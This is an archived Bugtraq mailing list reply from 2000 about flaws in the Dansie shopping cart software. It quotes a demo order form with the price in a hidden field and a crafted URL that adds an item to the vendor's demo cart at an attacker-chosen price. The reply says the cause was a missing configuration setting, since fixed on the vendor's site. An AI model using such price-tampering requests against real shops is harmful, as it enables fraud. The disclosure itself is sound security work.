Bugtraq mailing list archives

Re: more problems with that POS dansie cart software!

From: pjh () MCCC EDU (Pete Holsberg)
Date: Sun, 16 Apr 2000 18:45:58 -0400

On Fri, 14 Apr 2000, tombow wrote:

if installing a backdoor in the cart software wasn't bad enough.. the
whole implimentation of pricing and adding items to cart is crap..

example form to add items to your cart (kindly provided on the publishers
site using the demo cart they set up for us):

*snip*

<FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl";>

Black Leather purse with leather straps<BR>
Price: $20.00<BR>

<INPUT TYPE=HIDDEN NAME=name     VALUE="Black leather purse">
<INPUT TYPE=HIDDEN NAME=price    VALUE="20.00">
<INPUT TYPE=HIDDEN NAME=sh       VALUE="1">  <!-- Shipping and Handling
-->
<INPUT TYPE=HIDDEN NAME=img      VALUE="purse.jpg">
<INPUT TYPE=HIDDEN NAME=return   VALUE="http://www.dansie.net/demo.html";>
<INPUT TYPE=HIDDEN NAME=custom1  VALUE="Black leather purse with leather straps">

<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
</FORM>

*snip*

a couple of quick alterations and we can now add:

one piece of crap cart software..

http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables

This occurs because the person who configured the script
failed to set "persoanl variable #66". Dansie has since
done that at www.dansie.net so that the above URL now fails
to change the shopping cart variables.

Pete